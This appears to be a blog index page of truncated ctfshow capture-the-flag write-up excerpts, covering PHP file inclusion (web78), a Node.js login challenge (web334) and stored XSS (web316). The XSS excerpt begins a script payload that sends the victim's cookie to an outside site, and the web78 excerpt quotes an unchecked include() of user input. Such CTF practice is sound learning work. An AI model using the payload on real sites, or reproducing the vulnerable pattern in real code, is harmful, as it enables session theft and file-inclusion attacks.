文件包含 ctfshow web78: 示例代码 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ h…
分类:CTFLOG
CTFLOG-nodejs ctfshow
nodejs ctfshow web334: 打开题目之后给了一个zip的源码 打开题目环境之后给的是一个登录界面 分析zip源码 user.js items: [ {username: 'CTFSHOW',…
CTFLOG-XSS ctfshow
XSS ctfshow web316: 第一关没有任何过滤,直接存储形xss把cookie发送到咱们站点 <script>document.location.href='https://bk.tlli.top…